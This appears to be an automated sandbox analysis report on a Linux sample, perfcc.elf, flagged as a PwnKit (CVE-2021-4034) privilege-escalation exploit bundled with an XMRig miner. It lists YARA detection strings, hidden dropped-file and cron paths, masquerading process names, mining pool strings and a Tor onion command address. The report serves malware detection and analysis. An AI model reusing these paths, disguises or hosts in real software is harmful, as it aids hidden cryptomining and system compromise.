unattended-upgrade-shutdown (PID: 6586, Parent: 1, MD5: 69f442c3e33b5f9a66b722c29ad89435) Arguments: /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
perfcc.elf	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x716106:$s1: PATH=GCONV_PATH= 0x716008:$s2: pkexec 0x716010:$s2: pkexec 0x71601b:$s2: pkexec 0x71606a:$s2: pkexec 0x71609a:$s2: pkexec 0x7160a1:$s2: pkexec 0x7160bf:$s2: pkexec 0x716120:$s2: pkexec 0x71612d:$s2: pkexec 0x71613d:$s2: pkexec 0x716144:$s2: pkexec

Dropped Files

Source	Rule	Description	Author	Strings
/usr/lib/libfsnldev.so	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x716106:$s1: PATH=GCONV_PATH= 0x716008:$s2: pkexec 0x716010:$s2: pkexec 0x71601b:$s2: pkexec 0x71606a:$s2: pkexec 0x71609a:$s2: pkexec 0x7160a1:$s2: pkexec 0x7160bf:$s2: pkexec 0x716120:$s2: pkexec 0x71612d:$s2: pkexec 0x71613d:$s2: pkexec 0x716144:$s2: pkexec
/tmp/.perf.c/gpg-agent	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x716106:$s1: PATH=GCONV_PATH= 0x716008:$s2: pkexec 0x716010:$s2: pkexec 0x71601b:$s2: pkexec 0x71606a:$s2: pkexec 0x71609a:$s2: pkexec 0x7160a1:$s2: pkexec 0x7160bf:$s2: pkexec 0x716120:$s2: pkexec 0x71612d:$s2: pkexec 0x71613d:$s2: pkexec 0x716144:$s2: pkexec
/tmp/.perf.c/raid5wq	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x716106:$s1: PATH=GCONV_PATH= 0x716008:$s2: pkexec 0x716010:$s2: pkexec 0x71601b:$s2: pkexec 0x71606a:$s2: pkexec 0x71609a:$s2: pkexec 0x7160a1:$s2: pkexec 0x7160bf:$s2: pkexec 0x716120:$s2: pkexec 0x71612d:$s2: pkexec 0x71613d:$s2: pkexec 0x716144:$s2: pkexec
/root/.config/cron/perfcc	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x716106:$s1: PATH=GCONV_PATH= 0x716008:$s2: pkexec 0x716010:$s2: pkexec 0x71601b:$s2: pkexec 0x71606a:$s2: pkexec 0x71609a:$s2: pkexec 0x7160a1:$s2: pkexec 0x7160bf:$s2: pkexec 0x716120:$s2: pkexec 0x71612d:$s2: pkexec 0x71613d:$s2: pkexec 0x716144:$s2: pkexec
/usr/lib/libpprocps.so	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x716106:$s1: PATH=GCONV_PATH= 0xff4f01:$s1: PATH=GCONV_PATH= 0x18d3cfc:$s1: PATH=GCONV_PATH= 0x21b2af7:$s1: PATH=GCONV_PATH= 0x2a918f2:$s1: PATH=GCONV_PATH= 0x716008:$s2: pkexec 0x716010:$s2: pkexec 0x71601b:$s2: pkexec 0x71606a:$s2: pkexec 0x71609a:$s2: pkexec 0x7160a1:$s2: pkexec 0x7160bf:$s2: pkexec 0x716120:$s2: pkexec 0x71612d:$s2: pkexec 0x71613d:$s2: pkexec 0x716144:$s2: pkexec 0xff4e03:$s2: pkexec 0xff4e0b:$s2: pkexec 0xff4e16:$s2: pkexec 0xff4e65:$s2: pkexec 0xff4e95:$s2: pkexec
/usr/lib/libpprocps.so	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x716106:$s1: PATH=GCONV_PATH= 0xff4f01:$s1: PATH=GCONV_PATH= 0x18d3cfc:$s1: PATH=GCONV_PATH= 0x21b2af7:$s1: PATH=GCONV_PATH= 0x2a918f2:$s1: PATH=GCONV_PATH= 0x716008:$s2: pkexec 0x716010:$s2: pkexec 0x71601b:$s2: pkexec 0x71606a:$s2: pkexec 0x71609a:$s2: pkexec 0x7160a1:$s2: pkexec 0x7160bf:$s2: pkexec 0x716120:$s2: pkexec 0x71612d:$s2: pkexec 0x71613d:$s2: pkexec 0x716144:$s2: pkexec 0xff4e03:$s2: pkexec 0xff4e0b:$s2: pkexec 0xff4e16:$s2: pkexec 0xff4e65:$s2: pkexec 0xff4e95:$s2: pkexec
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6252.1.000000000145c000.0000000001723000.rw-.sdmp	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0xb7f94:$s1: PATH=GCONV_PATH= 0xb7e96:$s2: pkexec 0xb7e9e:$s2: pkexec 0xb7ea9:$s2: pkexec 0xb7ef8:$s2: pkexec 0xb7f28:$s2: pkexec 0xb7f2f:$s2: pkexec 0xb7f4d:$s2: pkexec 0xb7fae:$s2: pkexec 0xb7fbb:$s2: pkexec 0xb7fcb:$s2: pkexec 0xb7fd2:$s2: pkexec
6239.1.000000000145c000.0000000001723000.rw-.sdmp	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0xb7f94:$s1: PATH=GCONV_PATH= 0xb7e96:$s2: pkexec 0xb7e9e:$s2: pkexec 0xb7ea9:$s2: pkexec 0xb7ef8:$s2: pkexec 0xb7f28:$s2: pkexec 0xb7f2f:$s2: pkexec 0xb7f4d:$s2: pkexec 0xb7fae:$s2: pkexec 0xb7fbb:$s2: pkexec 0xb7fcb:$s2: pkexec 0xb7fd2:$s2: pkexec
6620.1.0000000000400000.0000000000854000.r-x.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
6620.1.0000000000400000.0000000000854000.r-x.sdmp	Linux_Cryptominer_Malxmr_f35a670c	unknown	unknown	0x23e4f0:$a: 4C 01 CD 48 0F AF D6 48 8D 54 55 00 89 DD 48 31 D7 48 C1 C7 20
6620.1.0000000000400000.0000000000854000.r-x.sdmp	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x1e6098:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
6616.1.0000000000400000.0000000000854000.r-x.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
6616.1.0000000000400000.0000000000854000.r-x.sdmp	Linux_Cryptominer_Malxmr_f35a670c	unknown	unknown	0x23e4f0:$a: 4C 01 CD 48 0F AF D6 48 8D 54 55 00 89 DD 48 31 D7 48 C1 C7 20
6616.1.0000000000400000.0000000000854000.r-x.sdmp	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x1e6098:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
6252.1.0000000000400000.00000000011cb000.r-x.sdmp	SUSP_ELF_Tor_Client	Detects VPNFilter malware	Florian Roth	0xb066b8:$x1: We needed to load a secret key from %s, but it was encrypted. Try 'tor --keygen' instead, so you can enter the passphrase. 0xabd5a0:$x2: Received a VERSION cell with odd payload length %d; closing connection. 0xb08950:$x3: Please upgrade! This version of Tor (%s) is %s, according to the directory authorities. Recommended versions are: %s
6239.1.0000000000400000.00000000011cb000.r-x.sdmp	SUSP_ELF_Tor_Client	Detects VPNFilter malware	Florian Roth	0xb066b8:$x1: We needed to load a secret key from %s, but it was encrypted. Try 'tor --keygen' instead, so you can enter the passphrase. 0xabd5a0:$x2: Received a VERSION cell with odd payload length %d; closing connection. 0xb08950:$x3: Please upgrade! This version of Tor (%s) is %s, according to the directory authorities. Recommended versions are: %s
Process Memory Space: perfcc.elf PID: 6239	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x29ffb9:$s1: PATH=GCONV_PATH= 0x2a0148:$s1: PATH=GCONV_PATH= 0x29fecc:$s2: pkexec 0x29fed4:$s2: pkexec 0x29fedc:$s2: pkexec 0x29ff24:$s2: pkexec 0x29ff54:$s2: pkexec 0x29ff5b:$s2: pkexec 0x29ff79:$s2: pkexec 0x29ffd3:$s2: pkexec 0x29ffe0:$s2: pkexec 0x29fff0:$s2: pkexec 0x29fff7:$s2: pkexec 0x2a0060:$s2: pkexec 0x2a0067:$s2: pkexec 0x2a0070:$s2: pkexec 0x2a00b6:$s2: pkexec 0x2a00e3:$s2: pkexec 0x2a00ea:$s2: pkexec 0x2a0106:$s2: pkexec 0x2a0161:$s2: pkexec
Process Memory Space: sh PID: 6252	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x5060c:$s1: PATH=GCONV_PATH= 0x5079b:$s1: PATH=GCONV_PATH= 0x5051f:$s2: pkexec 0x50527:$s2: pkexec 0x5052f:$s2: pkexec 0x50577:$s2: pkexec 0x505a7:$s2: pkexec 0x505ae:$s2: pkexec 0x505cc:$s2: pkexec 0x50626:$s2: pkexec 0x50633:$s2: pkexec 0x50643:$s2: pkexec 0x5064a:$s2: pkexec 0x506b3:$s2: pkexec 0x506ba:$s2: pkexec 0x506c3:$s2: pkexec 0x50709:$s2: pkexec 0x50736:$s2: pkexec 0x5073d:$s2: pkexec 0x50759:$s2: pkexec 0x507b4:$s2: pkexec
Process Memory Space: nohup PID: 6252	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x5060c:$s1: PATH=GCONV_PATH= 0x5079b:$s1: PATH=GCONV_PATH= 0x5051f:$s2: pkexec 0x50527:$s2: pkexec 0x5052f:$s2: pkexec 0x50577:$s2: pkexec 0x505a7:$s2: pkexec 0x505ae:$s2: pkexec 0x505cc:$s2: pkexec 0x50626:$s2: pkexec 0x50633:$s2: pkexec 0x50643:$s2: pkexec 0x5064a:$s2: pkexec 0x506b3:$s2: pkexec 0x506ba:$s2: pkexec 0x506c3:$s2: pkexec 0x50709:$s2: pkexec 0x50736:$s2: pkexec 0x5073d:$s2: pkexec 0x50759:$s2: pkexec 0x507b4:$s2: pkexec
Process Memory Space: perfcc.elf PID: 6252	Linux_Exploit_CVE_2021_4034_1c8f235d	unknown	unknown	0x5060c:$s1: PATH=GCONV_PATH= 0x5079b:$s1: PATH=GCONV_PATH= 0x5051f:$s2: pkexec 0x50527:$s2: pkexec 0x5052f:$s2: pkexec 0x50577:$s2: pkexec 0x505a7:$s2: pkexec 0x505ae:$s2: pkexec 0x505cc:$s2: pkexec 0x50626:$s2: pkexec 0x50633:$s2: pkexec 0x50643:$s2: pkexec 0x5064a:$s2: pkexec 0x506b3:$s2: pkexec 0x506ba:$s2: pkexec 0x506c3:$s2: pkexec 0x50709:$s2: pkexec 0x50736:$s2: pkexec 0x5073d:$s2: pkexec 0x50759:$s2: pkexec 0x507b4:$s2: pkexec
Process Memory Space: sh PID: 6616	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: nohup PID: 6616	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: perfctl PID: 6616	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: perfctl PID: 6620	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 13 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: perfcc.elf

Avira: detected

Antivirus detection for dropped file

Source: /root/.config/cron/perfcc	Avira: detection malicious, Label: EXP/AVI.CVE.suebo
Source: /tmp/.perf.c/gpg-agent	Avira: detection malicious, Label: EXP/AVI.CVE.suebo
Source: /usr/lib/libfsnldev.so	Avira: detection malicious, Label: EXP/AVI.CVE.suebo
Source: /usr/bin/.local/bin/top	Avira: detection malicious, Label: LINUX/Agent.sekdd
Source: /tmp/.perf.c/perfctl	Avira: detection malicious, Label: LINUX/BitCoinMiner.rssij
Source: /tmp/.perf.c/raid5wq	Avira: detection malicious, Label: EXP/AVI.CVE.suebo
Source: /usr/lib/libpprocps.so	Avira: detection malicious, Label: EXP/AVI.CVE.suebo

Multi AV Scanner detection for submitted file

Source: perfcc.elf	ReversingLabs: Detection: 68%
Source: perfcc.elf	Virustotal: Detection: 62%			Perma Link

Machine Learning detection for dropped file

Source: /root/.config/cron/perfcc	Joe Sandbox ML: detected
Source: /tmp/.perf.c/gpg-agent	Joe Sandbox ML: detected
Source: /usr/lib/libfsnldev.so	Joe Sandbox ML: detected
Source: /tmp/.perf.c/raid5wq	Joe Sandbox ML: detected
Source: /usr/lib/libpprocps.so	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: perfcc.elf

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 6620.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6616.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sh PID: 6616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nohup PID: 6616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: perfctl PID: 6616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: perfctl PID: 6620, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp	String found in binary or memory: stratum+ssl://
Source: sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp	String found in binary or memory: cryptonight/0
Source: sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp	String found in binary or memory: stratum+tcp://
Source: sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp	String found in binary or memory: XMRig 6.20.0

Source: /tmp/perfcc.elf (PID: 6239)	Reads CPU info from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	Reads CPU info from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from proc file: /proc/cpuinfo
Source: /usr/bin/perfcc (PID: 6491)	Reads CPU info from proc file: /proc/cpuinfo
Source: /tmp/.perf.c/gpg-agent (PID: 6684)	Reads CPU info from proc file: /proc/cpuinfo

Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_id	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/size	Jump to behavior
Source: /usr/bin/pkill (PID: 6555)	Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_id
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_id
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/possible
Source: /usr/bin/ps (PID: 6631)	Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/kill (PID: 6699)	Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6714)	Reads CPU info from /sys: /sys/devices/system/cpu/online

Networking

Found Tor onion address

Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onion
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txt
Source: sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onion
Source: sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txt
Source: nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onion
Source: nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txt
